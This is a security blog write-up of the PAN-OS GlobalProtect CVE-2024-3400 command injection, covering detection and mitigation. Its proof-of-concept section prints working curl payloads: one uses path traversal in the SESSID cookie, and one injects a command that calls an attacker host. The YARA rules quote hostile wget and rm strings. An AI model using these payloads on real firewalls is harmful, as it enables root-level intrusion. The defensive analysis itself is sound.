Command Injection Vulnerability in Palo Alto Networks PAN-OS CVE-2024-3400

Berkay Soylu
Posted: April 19, 2024
Contents

CVE-2024-3400 is an arbitrary file creation vulnerability that leads to OS command injection in GlobalProtect, a zero-day vulnerability in Palo Alto Networks PAN-OS.

As you read you will also learn:

Vulnerability: CVE-2024-3400 Analysis
Introduction: Overview of PAN-OS, mention of SonicWall discovery
CVE-2024-3400: Details on pre-authenticated RCE vulnerability
Severity & Affected Versions: Information on affected versions
Exploitation Status: Vulnerability Exploitation In the Wild
Vulnerability Details: Explanation and details of CVE-2024-3400
What is PaloAlto PAN-OS: Brief description of Palo Alto PAN-OS
Exploitation Overview: General overview of vulnerability and its impact
Proof-of-Concept: Demonstration of exploit with a proof-of-concept
Detection: Identifying Signs of Exploitation of CVE-2024-3400
Mitigations: Suggestions for mitigation for CVE-2024-3400
Conclusion: Summary of key findings and potential risks
References: Citations and sources for further reading
IOC: Indicators of Compromise for CVE-2024-3400

TL;DR

This report details the discovery and exploitation of a critical zero-day vulnerability (CVE-2024-3400) in Palo Alto Networks GlobalProtect firewall appliances, allowing remote code execution. The article provides insights into vulnerability analysis, exploitation with a proof-of-concept, and detection. By understanding and addressing these vulnerabilities, organizations can improve their security posture and protect their systems from potential malicious attacks.

Introduction

On April 12th, 2024, Palo Alto Networks announced CVE-2024-3400. CVE-2024-3400 is a CVSS 10 critical arbitrary file-write vulnerability in Palo Alto Networks PAN-OS software versions 10.2, 11.0, and 11.1.  This vulnerability enables unauthenticated attackers to execute arbitrary Linux commands with root-level privileges on affected firewalls if firewalls are configured with a GlobalProtect gateway or portal (or both) and device telemetry enabled.

This blog article provides an analysis of the command injection zero-day vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software, CVE-2024-3400. Palo Alto Networks published the details of CVE-2024-3400, a severe command injection vulnerability with a CVSS score of 10 that poses an alarming risk to system integrity. The vulnerability has the potential to allow remote code execution (RCE) on affected systems, making it highly critical and deserving of immediate attention.

Palo Alto Networks tracks the malicious activity targeting CVE-2024-3400 under the campaign name #OperationMidnightEclipse; the campaign exploits the vulnerability in certain versions of PAN-OS software.

CVE-2024-3400 is a pre-authentication RCE flaw discovered in PAN-OS. It allows unauthenticated attackers to execute arbitrary code on impacted firewalls with root privileges.

By understanding the nature of these vulnerabilities and proactively addressing them, organizations can enhance their security posture and protect their systems from potential malicious attacks. This blog article aims to provide valuable insights into these vulnerabilities, enabling organizations to take the necessary steps to safeguard their infrastructure.

Severity & Affected Versions

A command injection as a result of an arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software, for specific PAN-OS versions and distinct feature configurations, may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The CVSS score for this vulnerability is 10, which is rated Critical.

Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Versions Affected:

  • CVE-2024-3400: PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1.

This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal. Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability.

Exploitation Status

Palo Alto Networks has reported active exploitation of this vulnerability in the wild. Third parties have publicly disclosed proof of concept (POC) of the vulnerability, potentially increasing the risk of exploitation on vulnerable servers.

Vulnerability Details

To gain a deeper understanding of the two weaknesses that make up this vulnerability and to see the exploit in action with a proof-of-concept, we first set up our lab, then discuss the issue in general and finally at a technical level.

What is PAN-OS & GlobalProtect?

PAN-OS and GlobalProtect are both products of Palo Alto Networks.

PAN-OS is the operating system used by Palo Alto Networks' next-generation firewalls. It provides the core functionality and features for these firewalls, including network security, threat prevention, and management capabilities.

GlobalProtect is Palo Alto's SSL VPN implementation, and the command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software, for specific PAN-OS versions and distinct feature configurations, is what enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

Analysis of CVE-2024-3400

A critical command injection vulnerability has been identified in Palo Alto Networks PAN-OS software, specifically affecting versions PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1. This vulnerability, designated CVE-2024-3400, has a CVSS v3.x rating of 10 out of 10, indicating critical severity.

The vulnerability allows an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. It is important to note that this issue is specifically applicable to firewalls configured with the GlobalProtect gateway or GlobalProtect portal, or both. It is not necessary for device telemetry to be enabled for PAN-OS firewalls to be susceptible to attacks exploiting this vulnerability. 

CVE-2024-3400 consists of two main parts: Arbitrary File Creation and Arbitrary Command Injection. The details are explained in the image below:

Zero-day exploitation of a vulnerability in Palo Alto Global Protect firewall devices that allowed for unauthenticated remote code execution to take place. Initial exploitation was used to create a reverse shell, download tools, exfiltrate configuration data, and move laterally within the network.

The threat actor has developed and attempted to deploy a novel Python-based backdoor that Volexity calls UPSTYLE.

UPSTYLE Sample Recorded on Virustotal

The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests. 

The purpose of the update.py script is to deploy a backdoor to the following path: /usr/lib/python3.6/site-packages/system.pth. The backdoor, written in Python, starts with an import and its main content is stored as a base64 encoded blob. Therefore, by creating this file, each time any other code on the device attempts to import the module, the malicious code is executed.

Given the potential for Remote Code Execution (RCE), there are numerous possible exploitation scenarios when attackers have the ability to exploit this vulnerability. It is imperative for organizations to promptly address this issue to safeguard their PAN-OS firewalls from potential exploitation.

Exploitation of CVE-2024-3400 (POC)

CVE-2024-3400, a critical vulnerability in PAN-OS within the GlobalProtect feature, involves a sequence of security weaknesses: Path Traversal, Arbitrary File Creation, and OS Command Injection. This combination of vulnerabilities allows attackers to do remote code execution, posing a significant risk to the affected systems.

  1. The vulnerability begins with a Path Traversal flaw, enabling attackers to access directories and files outside of the intended scope

  2. Subsequently, the vulnerability allows for the creation of arbitrary files anywhere on the system. These files are created with root privileges.

  3. The most severe aspect of this vulnerability is the OS Command Injection. The telemetry service, which operates via a scheduled task located in /etc/cron.d/device_telemetry_send, is susceptible to command injection through the file name parameter. Attackers can exploit this by injecting malicious commands into the file names. When the telemetry service processes these files using the /usr/local/bin/dt_send and /usr/local/bin/dt_curl scripts, the injected commands will be executed with root privileges, allowing the attacker to run arbitrary code on the vulnerable PAN-OS system.

Arbitrary File Creation

The GlobalProtect application can be accessed from the web interface. GlobalProtect serves an HTTPS service on port 443.

The web server sets a SESSID cookie for unauthenticated sessions and the data affiliated with the session cookie is placed in /tmp/sslvpn.

curl https://hostname/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../var/appweb/sslvpndocs/global-protect/portal/images/letsdefend.txt'

By sending the given request we were able to create a file with root privileges.

Checking the session directory confirms that the data was written in the related path.

Command Injection Exploitation

The vulnerability allows an attacker to create empty files with any name anywhere on the system as the root user. We've also found that the telemetry service can be exploited through a command injection by manipulating the file name parameter. As explained in the AttackerKB analysis:

  • The telemetry service runs regularly through a scheduled task, or cron job, located in /etc/cron.d/device_telemetry_send
  • The script /usr/local/bin/dt_send checks the /opt/panlogs/tmp/device_telemetry/hour and /opt/panlogs/tmp/device_telemetry/day directories for any new files. 
  • It then sends the file names in a cURL request every hour using the /usr/local/bin/dt_curl script.

Considering this, attackers could potentially inject malicious commands into the file names, which would be executed when the telemetry service processes them.

curl https://hostname/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}attacker:4444?user=$(whoami)`'

To replicate this we send an unauthenticated cURL request with a forged payload in the SESSID cookie value to the GlobalProtect web server in order to initiate remote code execution. The payload will be executed and deleted from the telemetry directory when the server runs its telemetry transmission function once per hour.

On the attacker machine, a Python web server receives a GET request that indicates our code was executed with root privileges.

Detection of CVE-2024-3400

Effective detection plays a crucial role in addressing this vulnerability. It is essential to have a comprehensive understanding of log paths, the utilization of relevant security products, and knowing where to look for potential indicators, enhancing the overall detection strategy.

Palo Alto Networks suggests the following steps in their advisory for a quick check to identify attempted exploit activity.

  • The following command can be used from the PAN-OS CLI to help identify if there was an attempted exploit activity on the device:
grep pattern "failed to unmarshal session(.\+.\/" mp-log gpsvc.log*

  • If the value between "session(" and ")" does not look like a GUID, but instead contains a file system path or embedded shell commands, this could be related to an attempted exploitation of CVE-2024-3400, which will warrant further investigation to correlate with other indicators of compromise.

  • Grep output indicating an attempted exploit may look like the following entry:
failed to unmarshal session(../../some/path)

  • Grep output indicating normal behavior will typically appear like the following entry:
failed to unmarshal session(01234567-89ab-cdef-1234-567890abcdef)
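As an added example (not from the original post or from Palo Alto Networks), a small Python triage helper that applies the check above to gpsvc.log lines: it extracts the value inside "session(...)" and reports whether it is a GUID or contains path or shell content. The sample log lines are constructed, and the timestamp prefix is an assumption.

```python
import re

# Log message quoted in the Palo Alto Networks guidance above; the value inside
# "session(...)" is the SESSID cookie the server failed to unmarshal. The match
# is greedy so a value that itself contains ")" is captured whole.
UNMARSHAL_RE = re.compile(r"failed to unmarshal session\((?P<sid>.*)\)")

# A legitimate session id is a GUID: 8-4-4-4-12 hex digits.
GUID_RE = re.compile(r"^[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$")

# Markers that never belong in a session id: path separators / traversal and
# shell metacharacters such as those the YARA rules on this page look for.
SUSPICIOUS_MARKERS = ("../", "./", "/", "`", "$(", "${", "|", ";", "&")


def classify_session_value(sid: str) -> str:
    """'benign' for a GUID, 'suspicious' for path/shell content, else 'unknown'."""
    if GUID_RE.match(sid):
        return "benign"
    if any(marker in sid for marker in SUSPICIOUS_MARKERS):
        return "suspicious"
    return "unknown"


def triage_gpsvc_log(lines):
    """Return (classification, session value) for every unmarshal failure in lines."""
    findings = []
    for line in lines:
        m = UNMARSHAL_RE.search(line)
        if m:
            sid = m.group("sid")
            findings.append((classify_session_value(sid), sid))
    return findings


# Constructed sample of gpsvc.log content (the timestamp prefix is assumed);
# the first two lines mirror the normal and attempted-exploit entries quoted above.
SAMPLE_GPSVC_LOG = [
    "2024-04-15 10:01:02 failed to unmarshal session(01234567-89ab-cdef-1234-567890abcdef)",
    "2024-04-15 10:02:13 failed to unmarshal session(../../some/path)",
    "2024-04-15 10:03:44 failed to unmarshal session(./../../../opt/panlogs/tmp/device_telemetry/hour/x${IFS}y)",
    "2024-04-15 10:04:00 unrelated gpsvc message with no session value",
]

if __name__ == "__main__":
    for verdict, sid in triage_gpsvc_log(SAMPLE_GPSVC_LOG):
        print(f"{verdict:10s} {sid}")
```

Run it against a copy of gpsvc.log exported from the device; any "suspicious" hit should be correlated with the other artefacts listed below.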

Identifying Signs of Exploitation

Successful exploitation may result in artifacts being left in several directories and log files used by PAN-OS.

The NGINX frontend web server, responsible for proxying requests to the GlobalProtect service, logs all HTTP requests to /var/log/nginx/sslvpn_access.log.

Likewise, the file /var/log/pan/sslvpn-access/sslvpn-access.log will also record the HTTP requests, as demonstrated below:

When targeting the device telemetry for command injection, the attacker may place a file with zero length in one of the subdirectories within /opt/panlogs/tmp/device_telemetry/, such as /opt/panlogs/tmp/device_telemetry/hour/ or /opt/panlogs/tmp/device_telemetry/day/. This file's name will likely include characters suitable for command injection. Therefore, the contents of this directory and its subdirectories should be examined for any suspicious zero-length files.

The log file /var/log/pan/device_telemetry_send.log will display the injected command.
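As an added example (not from the original post), a Python scan of the telemetry staging directories described above that lists files whose names contain shell metacharacters, reporting their size so zero-length ones stand out. The directory tree it builds for demonstration is constructed in a temporary directory; the real root path is the one named in the text.

```python
import os
import tempfile

# Telemetry staging tree named in the text; "minute" appears in the YARA rule
# string "rm -rf /opt/panlogs/tmp/device_telemetry/minute/*" further below.
TELEMETRY_ROOT = "/opt/panlogs/tmp/device_telemetry"
TELEMETRY_SUBDIRS = ("hour", "day", "minute")

# Characters that let a file name break out of the cURL command built by
# dt_curl; a telemetry archive name should never contain any of them.
SHELL_METACHARS = set("`$(){}|;&<>'\"\\ ")


def is_suspicious_name(name: str) -> bool:
    return any(ch in SHELL_METACHARS for ch in name)


def scan_telemetry_dir(root: str = TELEMETRY_ROOT):
    """Return sorted (relative path, size) for files whose names contain shell
    metacharacters. A size of 0 matches the zero-length artefact described above."""
    hits = []
    for sub in TELEMETRY_SUBDIRS:
        directory = os.path.join(root, sub)
        if not os.path.isdir(directory):
            continue
        for name in os.listdir(directory):
            path = os.path.join(directory, name)
            if os.path.isfile(path) and is_suspicious_name(name):
                hits.append((os.path.join(sub, name), os.path.getsize(path)))
    return sorted(hits)


def build_constructed_tree() -> str:
    """Create a throwaway copy of the telemetry layout for testing: one
    ordinary-looking archive and one empty file with a shell-metacharacter
    name. This is a constructed sample, not data from a real device."""
    root = tempfile.mkdtemp(prefix="device_telemetry_")
    for sub in ("hour", "day"):
        os.makedirs(os.path.join(root, sub))
    with open(os.path.join(root, "hour", "telemetry_2024-04-15.tgz"), "wb") as f:
        f.write(b"\x00" * 16)
    open(os.path.join(root, "hour", "aaa${IFS}b"), "wb").close()
    return root


if __name__ == "__main__":
    sample_root = build_constructed_tree()
    for rel_path, size in scan_telemetry_dir(sample_root):
        print(f"{size:>6} bytes  {rel_path}")
```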

Threat Hunting Queries 

The Unit42 team has created XQL queries to search for signs of exploitation. These queries can assist in understanding the hunt for CVE-2024-3400.

Unit 42 Managed Threat Hunting Queries

Yara Rules 

To detect exploitation of CVE-2024-3400, you can use public YARA rules written by the cybersecurity community. Here are YARA rules that detect exploitation attempts of CVE-2024-3400.

rule APT_UTA028_ForensicArtefacts_PaloAlto_CVE_2024_3400_Apr24_1 : SCRIPT {
   meta:
      description = "Detects forensic artefacts of APT UTA028 as found in a campaign exploiting the Palo Alto CVE-2024-3400 vulnerability"
      author = "Florian Roth"
      reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
      date = "2024-04-15"
      modified = "2024-04-18"
      score = 70
   strings:
      $x1 = "cmd = base64.b64decode(rst.group"
      $x2 = "f.write(\"/*\"+output+\"*/\")"

      $x3 = "* * * * * root wget -qO- http://"
      $x4 = "rm -f /var/appweb/sslvpndocs/global-protect/*.css"

      $x5a = "failed to unmarshal session(../" // https://security.paloaltonetworks.com/CVE-2024-3400
      $x5b = "failed to unmarshal session(./../" // customer data

      $x6 = "rm -rf /opt/panlogs/tmp/device_telemetry/minute/*" base64
      $x7 = "$(uname -a) > /var/" base64
   condition:
      1 of them
}

CVE-2024-3400 Yara Rules

rule EXPL_PaloAlto_CVE_2024_3400_Apr24_1 {
   meta:
      description = "Detects characteristics of the exploit code used in attacks against Palo Alto GlobalProtect CVE-2024-3400"
      author = "Florian Roth"
      reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
      date = "2024-04-15"
      score = 70
   strings:
      $x1 = "SESSID=../../../../opt/panlogs/"
      $x2 = "SESSID=./../../../../opt/panlogs/"

      $sa1 = "SESSID=../../../../"
      $sa2 = "SESSID=./../../../../"

      $sb2 = "${IFS}"
   condition:
      1 of ($x*)
      or (1 of ($sa*) and $sb2)
}

CVE-2024-3400 Yara Rules

LetsDefend Simulated SOC Alerts

On the LetsDefend platform, you can practice by analyzing the latest zero-days in a realistic SOC environment. You can investigate EventID:249 - SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400) and learn how attackers exploit vulnerabilities to gain unauthorized access and execute malicious code.

https://letsdefend.io/

Mitigations And Recommendations

  • To mitigate this vulnerability, customers are advised to upgrade to the following fixed versions of PAN-OS:
    - PAN-OS 10.2.9-h1
    - PAN-OS 11.0.4-h1
    - PAN-OS 11.1.2-h3
    and all later PAN-OS versions. Upgrading to these versions provides full protection against the vulnerability.

  • You can monitor for suspicious network activities until the patch for a clean version is applied. During this process, establish rules on security products to monitor network connections, generating alerts until the patching is completed.

  • Customers can also mitigate the vulnerability by enabling Threat ID 95187 if they have a Threat Prevention subscription.

  • To enhance your understanding of exploiting the relevant vulnerability in a real-world scenario, you can improve your analysis skills by resolving the "EventID:249 - SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)" alert in the LetsDefend Training section. This will provide you with more detailed insights into the vulnerability, allowing you to enhance your proficiency in vulnerability analysis.

  • Organisations with a Threat Prevention subscription can temporarily mitigate CVE-2024-3400 by enabling Threat IDs 95187, 95189 and 95191.

  • The vulnerability has been remediated in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions. Organisations are required to implement these security updates as soon as possible.
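As an added example (not from the original post or from Palo Alto Networks), a Python check that compares a firewall's PAN-OS version against the three fixed releases listed above and the GlobalProtect precondition stated in the advisory. The inventory it evaluates is a constructed sample; treating every version in an affected train below the listed hotfix as unpatched is an assumption based only on the versions this page names.

```python
import re

# Fixed releases listed in the advisory, keyed by affected release train.
# Everything below the hotfix within a train is treated as unpatched; trains
# not listed here (for example 10.1) are not affected according to the advisory.
FIXED_VERSIONS = {
    (10, 2): "10.2.9-h1",
    (11, 0): "11.0.4-h1",
    (11, 1): "11.1.2-h3",
}

# PAN-OS version strings look like "11.1.2" or "11.1.2-h3"; "-hN" is a hotfix.
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(version: str):
    """Turn '10.2.9-h1' into the comparable tuple (10, 2, 9, 1)."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version string: {version!r}")
    major, minor, patch, hotfix = m.groups()
    return (int(major), int(minor), int(patch), int(hotfix or 0))


def is_vulnerable(version: str, globalprotect_configured: bool = True) -> bool:
    """True when the firewall runs an affected train below its fixed hotfix and
    has a GlobalProtect portal or gateway configured (the advisory's precondition)."""
    parsed = parse_version(version)
    fixed = FIXED_VERSIONS.get(parsed[:2])
    if fixed is None or not globalprotect_configured:
        return False
    return parsed < parse_version(fixed)


def triage_inventory(devices):
    """devices: iterable of (hostname, version, globalprotect_configured).
    Returns the hostnames that still need the hotfix."""
    return [host for host, ver, gp in devices if is_vulnerable(ver, gp)]


# Constructed inventory; hostnames and versions are sample values.
SAMPLE_INVENTORY = [
    ("fw-edge-01", "10.2.8", True),
    ("fw-edge-02", "10.2.9-h1", True),
    ("fw-dc-01", "11.1.2-h2", True),
    ("fw-dc-02", "11.1.2-h2", False),
    ("fw-lab-01", "10.1.11", True),
]

if __name__ == "__main__":
    print("needs hotfix:", triage_inventory(SAMPLE_INVENTORY))
```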

Conclusion

In conclusion, it is crucial to promptly apply the necessary patch for a clean version in order to address any vulnerabilities in the system. Additionally, establishing rules on security products to monitor processes and network connections can help generate alerts and ensure that the patching process is completed effectively. By resolving the "EventID:249 - SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)" alert in the LetsDefend Training section, individuals can further develop their analysis skills and gain a deeper understanding of relevant vulnerabilities. This will ultimately enhance proficiency in vulnerability analysis and contribute to overall system security.

Indicator Of Compromise (IOC)

Publicly shared IOCs can be found on AlienVault OTX or in the volexity/threat-intel GitHub repository.

CVE-2024-3400 IOC on OTX


References
